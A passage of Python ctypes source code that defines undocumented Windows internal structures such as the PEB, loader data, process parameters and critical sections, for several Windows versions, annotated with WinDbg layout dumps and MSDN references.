# ULONG WindowFlags;
# ULONG ShowWindowFlags;
# UNICODE_STRING WindowTitle;
# UNICODE_STRING DesktopName;
# UNICODE_STRING ShellInfo;
# UNICODE_STRING RuntimeData;
# RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
# } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
# kd> dt _RTL_USER_PROCESS_PARAMETERS
# ntdll!_RTL_USER_PROCESS_PARAMETERS
# +0x000 MaximumLength : Uint4B
# +0x004 Length : Uint4B
# +0x008 Flags : Uint4B
# +0x00c DebugFlags : Uint4B
# +0x010 ConsoleHandle : Ptr32 Void
# +0x014 ConsoleFlags : Uint4B
# +0x018 StandardInput : Ptr32 Void
# +0x01c StandardOutput : Ptr32 Void
# +0x020 StandardError : Ptr32 Void
# +0x024 CurrentDirectory : _CURDIR
# +0x030 DllPath : _UNICODE_STRING
# +0x038 ImagePathName : _UNICODE_STRING
# +0x040 CommandLine : _UNICODE_STRING
# +0x048 Environment : Ptr32 Void
# +0x04c StartingX : Uint4B
# +0x050 StartingY : Uint4B
# +0x054 CountX : Uint4B
# +0x058 CountY : Uint4B
# +0x05c CountCharsX : Uint4B
# +0x060 CountCharsY : Uint4B
# +0x064 FillAttribute : Uint4B
# +0x068 WindowFlags : Uint4B
# +0x06c ShowWindowFlags : Uint4B
# +0x070 WindowTitle : _UNICODE_STRING
# +0x078 DesktopInfo : _UNICODE_STRING
# +0x080 ShellInfo : _UNICODE_STRING
# +0x088 RuntimeData : _UNICODE_STRING
# +0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR
# +0x290 EnvironmentSize : Uint4B
##class RTL_USER_PROCESS_PARAMETERS(Structure):
## _fields_ = [
## ("MaximumLength", ULONG),
## ("Length", ULONG),
## ("Flags", ULONG),
## ("DebugFlags", ULONG),
## ("ConsoleHandle", PVOID),
## ("ConsoleFlags", ULONG),
## ("StandardInput", HANDLE),
## ("StandardOutput", HANDLE),
## ("StandardError", HANDLE),
## ("CurrentDirectory", CURDIR),
## ("DllPath", UNICODE_STRING),
## ("ImagePathName", UNICODE_STRING),
## ("CommandLine", UNICODE_STRING),
## ("Environment", PVOID),
## ("StartingX", ULONG),
## ("StartingY", ULONG),
## ("CountX", ULONG),
## ("CountY", ULONG),
## ("CountCharsX", ULONG),
## ("CountCharsY", ULONG),
## ("FillAttribute", ULONG),
## ("WindowFlags", ULONG),
## ("ShowWindowFlags", ULONG),
## ("WindowTitle", UNICODE_STRING),
## ("DesktopInfo", UNICODE_STRING),
## ("ShellInfo", UNICODE_STRING),
## ("RuntimeData", UNICODE_STRING),
## ("CurrentDirectores", RTL_DRIVE_LETTER_CURDIR * 32), # typo here?
##
## # Windows 2008 and Vista
## ("EnvironmentSize", ULONG),
##]
## @property
## def CurrentDirectories(self):
## return self.CurrentDirectores
# From MSDN:
#
# typedef struct _RTL_USER_PROCESS_PARAMETERS {
# BYTE Reserved1[16];
# PVOID Reserved2[10];
# UNICODE_STRING ImagePathName;
# UNICODE_STRING CommandLine;
# } RTL_USER_PROCESS_PARAMETERS,
# *PRTL_USER_PROCESS_PARAMETERS;
class RTL_USER_PROCESS_PARAMETERS(Structure):
_fields_ = [
("Reserved1", BYTE * 16),
("Reserved2", PVOID * 10),
("ImagePathName", UNICODE_STRING),
("CommandLine", UNICODE_STRING),
("Environment", PVOID), # undocumented!
#
# XXX TODO
# This structure should be defined with all undocumented fields for
# each version of Windows, just like it's being done for PEB and TEB.
#
]
PPS_POST_PROCESS_INIT_ROUTINE = PVOID
#from MSDN:
#
# typedef struct _PEB {
# BYTE Reserved1[2];
# BYTE BeingDebugged;
# BYTE Reserved2[21];
# PPEB_LDR_DATA LoaderData;
# PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
# BYTE Reserved3[520];
# PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
# BYTE Reserved4[136];
# ULONG SessionId;
# } PEB;
##class PEB(Structure):
## _fields_ = [
## ("Reserved1", BYTE * 2),
## ("BeingDebugged", BYTE),
## ("Reserved2", BYTE * 21),
## ("LoaderData", PVOID, # PPEB_LDR_DATA
## ("ProcessParameters", PVOID, # PRTL_USER_PROCESS_PARAMETERS
## ("Reserved3", BYTE * 520),
## ("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
## ("Reserved4", BYTE),
## ("SessionId", ULONG),
##]
# from MSDN:
#
# typedef struct _TEB {
# BYTE Reserved1[1952];
# PVOID Reserved2[412];
# PVOID TlsSlots[64];
# BYTE Reserved3[8];
# PVOID Reserved4[26];
# PVOID ReservedForOle;
# PVOID Reserved5[4];
# PVOID TlsExpansionSlots;
# } TEB,
# *PTEB;
##class TEB(Structure):
## _fields_ = [
## ("Reserved1", PVOID * 1952),
## ("Reserved2", PVOID * 412),
## ("TlsSlots", PVOID * 64),
## ("Reserved3", BYTE * 8),
## ("Reserved4", PVOID * 26),
## ("ReservedForOle", PVOID),
## ("Reserved5", PVOID * 4),
## ("TlsExpansionSlots", PVOID),
##]
# from http://undocumented.ntinternals.net/UserMode/Structures/LDR_MODULE.html
#
# typedef struct _LDR_MODULE {
# LIST_ENTRY InLoadOrderModuleList;
# LIST_ENTRY InMemoryOrderModuleList;
# LIST_ENTRY InInitializationOrderModuleList;
# PVOID BaseAddress;
# PVOID EntryPoint;
# ULONG SizeOfImage;
# UNICODE_STRING FullDllName;
# UNICODE_STRING BaseDllName;
# ULONG Flags;
# SHORT LoadCount;
# SHORT TlsIndex;
# LIST_ENTRY HashTableEntry;
# ULONG TimeDateStamp;
# } LDR_MODULE, *PLDR_MODULE;
class LDR_MODULE(Structure):
_fields_ = [
("InLoadOrderModuleList", LIST_ENTRY),
("InMemoryOrderModuleList", LIST_ENTRY),
("InInitializationOrderModuleList", LIST_ENTRY),
("BaseAddress", PVOID),
("EntryPoint", PVOID),
("SizeOfImage", ULONG),
("FullDllName", UNICODE_STRING),
("BaseDllName", UNICODE_STRING),
("Flags", ULONG),
("LoadCount", SHORT),
("TlsIndex", SHORT),
("HashTableEntry", LIST_ENTRY),
("TimeDateStamp", ULONG),
]
# from http://undocumented.ntinternals.net/UserMode/Structures/PEB_LDR_DATA.html
#
# typedef struct _PEB_LDR_DATA {
# ULONG Length;
# BOOLEAN Initialized;
# PVOID SsHandle;
# LIST_ENTRY InLoadOrderModuleList;
# LIST_ENTRY InMemoryOrderModuleList;
# LIST_ENTRY InInitializationOrderModuleList;
# } PEB_LDR_DATA, *PPEB_LDR_DATA;
class PEB_LDR_DATA(Structure):
_fields_ = [
("Length", ULONG),
("Initialized", BOOLEAN),
("SsHandle", PVOID),
("InLoadOrderModuleList", LIST_ENTRY),
("InMemoryOrderModuleList", LIST_ENTRY),
("InInitializationOrderModuleList", LIST_ENTRY),
]
# From http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB_FREE_BLOCK.html
#
# typedef struct _PEB_FREE_BLOCK {
# PEB_FREE_BLOCK *Next;
# ULONG Size;
# } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
class PEB_FREE_BLOCK(Structure):
pass
##PPEB_FREE_BLOCK = POINTER(PEB_FREE_BLOCK)
PPEB_FREE_BLOCK = PVOID
PEB_FREE_BLOCK._fields_ = [
("Next", PPEB_FREE_BLOCK),
("Size", ULONG),
]
# From http://undocumented.ntinternals.net/UserMode/Structures/RTL_DRIVE_LETTER_CURDIR.html
#
# typedef struct _RTL_DRIVE_LETTER_CURDIR {
# USHORT Flags;
# USHORT Length;
# ULONG TimeStamp;
# UNICODE_STRING DosPath;
# } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
class RTL_DRIVE_LETTER_CURDIR(Structure):
_fields_ = [
("Flags", USHORT),
("Length", USHORT),
("TimeStamp", ULONG),
("DosPath", UNICODE_STRING),
]
# From http://www.nirsoft.net/kernel_struct/vista/CURDIR.html
#
# typedef struct _CURDIR
# {
# UNICODE_STRING DosPath;
# PVOID Handle;
# } CURDIR, *PCURDIR;
class CURDIR(Structure):
_fields_ = [
("DosPath", UNICODE_STRING),
("Handle", PVOID),
]
# From http://www.nirsoft.net/kernel_struct/vista/RTL_CRITICAL_SECTION_DEBUG.html
#
# typedef struct _RTL_CRITICAL_SECTION_DEBUG
# {
# WORD Type;
# WORD CreatorBackTraceIndex;
# PRTL_CRITICAL_SECTION CriticalSection;
# LIST_ENTRY ProcessLocksList;
# ULONG EntryCount;
# ULONG ContentionCount;
# ULONG Flags;
# WORD CreatorBackTraceIndexHigh;
# WORD SpareUSHORT;
# } RTL_CRITICAL_SECTION_DEBUG, *PRTL_CRITICAL_SECTION_DEBUG;
#
# From http://www.nirsoft.net/kernel_struct/vista/RTL_CRITICAL_SECTION.html
#
# typedef struct _RTL_CRITICAL_SECTION
# {
# PRTL_CRITICAL_SECTION_DEBUG DebugInfo;
# LONG LockCount;
# LONG RecursionCount;
# PVOID OwningThread;
# PVOID LockSemaphore;
# ULONG SpinCount;
# } RTL_CRITICAL_SECTION, *PRTL_CRITICAL_SECTION;
#
class RTL_CRITICAL_SECTION(Structure):
_fields_ = [
("DebugInfo", PVOID), # PRTL_CRITICAL_SECTION_DEBUG
("LockCount", LONG),
("RecursionCount", LONG),
("OwningThread", PVOID),
("LockSemaphore", PVOID),
("SpinCount", ULONG),
]
class RTL_CRITICAL_SECTION_DEBUG(Structure):
_fields_ = [
("Type", WORD),
("CreatorBackTraceIndex", WORD),
("CriticalSection", PVOID), # PRTL_CRITICAL_SECTION
("ProcessLocksList", LIST_ENTRY),
("EntryCount", ULONG),
("ContentionCount", ULONG),
("Flags", ULONG),
("CreatorBackTraceIndexHigh", WORD),
("SpareUSHORT", WORD),
]
PRTL_CRITICAL_SECTION = POINTER(RTL_CRITICAL_SECTION)
PRTL_CRITICAL_SECTION_DEBUG = POINTER(RTL_CRITICAL_SECTION_DEBUG)
PPEB_LDR_DATA = POINTER(PEB_LDR_DATA)
PRTL_USER_PROCESS_PARAMETERS = POINTER(RTL_USER_PROCESS_PARAMETERS)
PPEBLOCKROUTINE = PVOID
# BitField
ImageUsesLargePages = 1 << 0
IsProtectedProcess = 1 << 1
IsLegacyProcess = 1 << 2
IsImageDynamicallyRelocated = 1 << 3
SkipPatchingUser32Forwarders = 1 << 4
# CrossProcessFlags
ProcessInJob = 1 << 0
ProcessInitializing = 1 << 1
ProcessUsingVEH = 1 << 2
ProcessUsingVCH = 1 << 3
ProcessUsingFTH = 1 << 4
# TracingFlags
HeapTracingEnabled = 1 << 0
CritSecTracingEnabled = 1 << 1
# NtGlobalFlags
FLG_VALID_BITS = 0x003FFFFF # not a flag
FLG_STOP_ON_EXCEPTION = 0x00000001
FLG_SHOW_LDR_SNAPS = 0x00000002
FLG_DEBUG_INITIAL_COMMAND = 0x00000004
FLG_STOP_ON_HUNG_GUI = 0x00000008
FLG_HEAP_ENABLE_TAIL_CHECK = 0x00000010
FLG_HEAP_ENABLE_FREE_CHECK = 0x00000020
FLG_HEAP_VALIDATE_PARAMETERS = 0x00000040
FLG_HEAP_VALIDATE_ALL = 0x00000080
FLG_POOL_ENABLE_TAIL_CHECK = 0x00000100
FLG_POOL_ENABLE_FREE_CHECK = 0x00000200
FLG_POOL_ENABLE_TAGGING = 0x00000400
FLG_HEAP_ENABLE_TAGGING = 0x00000800
FLG_USER_STACK_TRACE_DB = 0x00001000
FLG_KERNEL_STACK_TRACE_DB = 0x00002000
FLG_MAINTAIN_OBJECT_TYPELIST = 0x00004000
FLG_HEAP_ENABLE_TAG_BY_DLL = 0x00008000
FLG_IGNORE_DEBUG_PRIV = 0x00010000
FLG_ENABLE_CSRDEBUG = 0x00020000
FLG_ENABLE_KDEBUG_SYMBOL_LOAD = 0x00040000
FLG_DISABLE_PAGE_KERNEL_STACKS = 0x00080000
FLG_HEAP_ENABLE_CALL_TRACING = 0x00100000
FLG_HEAP_DISABLE_COALESCING = 0x00200000
FLG_ENABLE_CLOSE_EXCEPTION = 0x00400000
FLG_ENABLE_EXCEPTION_LOGGING = 0x00800000
FLG_ENABLE_HANDLE_TYPE_TAGGING = 0x01000000
FLG_HEAP_PAGE_ALLOCS = 0x02000000
FLG_DEBUG_WINLOGON = 0x04000000
FLG_ENABLE_DBGPRINT_BUFFERING = 0x08000000
FLG_EARLY_CRITICAL_SECTION_EVT = 0x10000000
FLG_DISABLE_DLL_VERIFICATION = 0x80000000
class _PEB_NT(Structure):
_pack_ = 4
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID),
("FastPebLockRoutine", PVOID), # PPEBLOCKROUTINE
("FastPebUnlockRoutine", PVOID), # PPEBLOCKROUTINE
("EnvironmentUpdateCount", ULONG),
("KernelCallbackTable", PVOID), # Ptr32 Ptr32 Void
("EventLogSection", PVOID),
("EventLog", PVOID),
("FreeList", PVOID), # PPEB_FREE_BLOCK
("TlsExpansionCounter", ULONG),
("TlsBitmap", PVOID),
("TlsBitmapBits", ULONG * 2),
("ReadOnlySharedMemoryBase", PVOID),
("ReadOnlySharedMemoryHeap", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", ULONG),
("NtGlobalFlag", ULONG),
("Spare2", BYTE * 4),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", ULONG),
("HeapSegmentCommit", ULONG),
("HeapDeCommitTotalFreeThreshold", ULONG),
("HeapDeCommitFreeBlockThreshold", ULONG),
("NumberOfHeaps", ULONG),
("MaximumNumberOfHeaps", ULONG),
("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", PVOID),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", ULONG),
("OSMinorVersion", ULONG),
("OSBuildNumber", ULONG),
("OSPlatformId", ULONG),
("ImageSubSystem", ULONG),
("ImageSubSystemMajorVersion", ULONG),
("ImageSubSystemMinorVersion", ULONG),
("ImageProcessAffinityMask", ULONG),
("GdiHandleBuffer", ULONG * 34),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", ULONG),
("TlsExpansionBitmapBits", BYTE * 128),
("SessionId", ULONG),
]
# not really, but "dt _PEB" in w2k isn't working for me :(
_PEB_2000 = _PEB_NT
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 SpareBool : UChar
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 FastPebLockRoutine : Ptr32 Void
# +0x024 FastPebUnlockRoutine : Ptr32 Void
# +0x028 EnvironmentUpdateCount : Uint4B
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 AtlThunkSListPtr32 : Uint4B
# +0x038 FreeList : Ptr32 _PEB_FREE_BLOCK
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 ReadOnlySharedMemoryHeap : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 Void
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ImageProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 Void
# +0x1fc ProcessAssemblyStorageMap : Ptr32 Void
# +0x200 SystemDefaultActivationContextData : Ptr32 Void
# +0x204 SystemAssemblyStorageMap : Ptr32 Void
# +0x208 MinimumStackCommit : Uint4B
class _PEB_XP(Structure):
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("SpareBool", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID),
("FastPebLockRoutine", PVOID),
("FastPebUnlockRoutine", PVOID),
("EnvironmentUpdateCount", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("AtlThunkSListPtr32", DWORD),
("FreeList", PVOID), # PPEB_FREE_BLOCK
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("ReadOnlySharedMemoryHeap", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", DWORD),
("HeapSegmentCommit", DWORD),
("HeapDeCommitTotalFreeThreshold", DWORD),
("HeapDeCommitFreeBlockThreshold", DWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ImageProcessAffinityMask", DWORD),
("GdiHandleBuffer", DWORD * 34),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", DWORD),
]
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 SpareBits : Pos 1, 7 Bits
# +0x008 Mutant : Ptr64 Void
# +0x010 ImageBaseAddress : Ptr64 Void
# +0x018 Ldr : Ptr64 _PEB_LDR_DATA
# +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
# +0x028 SubSystemData : Ptr64 Void
# +0x030 ProcessHeap : Ptr64 Void
# +0x038 FastPebLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x040 AtlThunkSListPtr : Ptr64 Void
# +0x048 SparePtr2 : Ptr64 Void
# +0x050 EnvironmentUpdateCount : Uint4B
# +0x058 KernelCallbackTable : Ptr64 Void
# +0x060 SystemReserved : [1] Uint4B
# +0x064 SpareUlong : Uint4B
# +0x068 FreeList : Ptr64 _PEB_FREE_BLOCK
# +0x070 TlsExpansionCounter : Uint4B
# +0x078 TlsBitmap : Ptr64 Void
# +0x080 TlsBitmapBits : [2] Uint4B
# +0x088 ReadOnlySharedMemoryBase : Ptr64 Void
# +0x090 ReadOnlySharedMemoryHeap : Ptr64 Void
# +0x098 ReadOnlyStaticServerData : Ptr64 Ptr64 Void
# +0x0a0 AnsiCodePageData : Ptr64 Void
# +0x0a8 OemCodePageData : Ptr64 Void
# +0x0b0 UnicodeCaseTableData : Ptr64 Void
# +0x0b8 NumberOfProcessors : Uint4B
# +0x0bc NtGlobalFlag : Uint4B
# +0x0c0 CriticalSectionTimeout : _LARGE_INTEGER
# +0x0c8 HeapSegmentReserve : Uint8B
# +0x0d0 HeapSegmentCommit : Uint8B
# +0x0d8 HeapDeCommitTotalFreeThreshold : Uint8B
# +0x0e0 HeapDeCommitFreeBlockThreshold : Uint8B
# +0x0e8 NumberOfHeaps : Uint4B
# +0x0ec MaximumNumberOfHeaps : Uint4B
# +0x0f0 ProcessHeaps : Ptr64 Ptr64 Void
# +0x0f8 GdiSharedHandleTable : Ptr64 Void
# +0x100 ProcessStarterHelper : Ptr64 Void
# +0x108 GdiDCAttributeList : Uint4B
# +0x110 LoaderLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x118 OSMajorVersion : Uint4B
# +0x11c OSMinorVersion : Uint4B
# +0x120 OSBuildNumber : Uint2B
# +0x122 OSCSDVersion : Uint2B
# +0x124 OSPlatformId : Uint4B
# +0x128 ImageSubsystem : Uint4B
# +0x12c ImageSubsystemMajorVersion : Uint4B
# +0x130 ImageSubsystemMinorVersion : Uint4B
# +0x138 ImageProcessAffinityMask : Uint8B
# +0x140 GdiHandleBuffer : [60] Uint4B
# +0x230 PostProcessInitRoutine : Ptr64 void
# +0x238 TlsExpansionBitmap : Ptr64 Void
# +0x240 TlsExpansionBitmapBits : [32] Uint4B
# +0x2c0 SessionId : Uint4B
# +0x2c8 AppCompatFlags : _ULARGE_INTEGER
# +0x2d0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x2d8 pShimData : Ptr64 Void
# +0x2e0 AppCompatInfo : Ptr64 Void
# +0x2e8 CSDVersion : _UNICODE_STRING
# +0x2f8 ActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x300 ProcessAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x308 SystemDefaultActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x310 SystemAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x318 MinimumStackCommit : Uint8B
# +0x320 FlsCallback : Ptr64 Ptr64 Void
# +0x328 FlsListHead : _LIST_ENTRY
# +0x338 FlsBitmap : Ptr64 Void
# +0x340 FlsBitmapBits : [4] Uint4B
# +0x350 FlsHighIndex : Uint4B
class _PEB_XP_64(Structure):
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
("AtlThunkSListPtr", PVOID),
("SparePtr2", PVOID),
("EnvironmentUpdateCount", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("SpareUlong", DWORD),
("FreeList", PVOID), # PPEB_FREE_BLOCK
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("ReadOnlySharedMemoryHeap", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr64 Ptr64 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", QWORD),
("HeapSegmentCommit", QWORD),
("HeapDeCommitTotalFreeThreshold", QWORD),
("HeapDeCommitFreeBlockThreshold", QWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr64 Ptr64 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ImageProcessAffinityMask", QWORD),
("GdiHandleBuffer", DWORD * 60),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", QWORD),
("FlsCallback", PVOID), # Ptr64 Ptr64 Void
("FlsListHead", LIST_ENTRY),
("FlsBitmap", PVOID),
("FlsBitmapBits", DWORD * 4),
("FlsHighIndex", DWORD),
]
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 SpareBits : Pos 1, 7 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 SparePtr2 : Ptr32 Void
# +0x028 EnvironmentUpdateCount : Uint4B
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 SpareUlong : Uint4B
# +0x038 FreeList : Ptr32 _PEB_FREE_BLOCK
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 ReadOnlySharedMemoryHeap : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
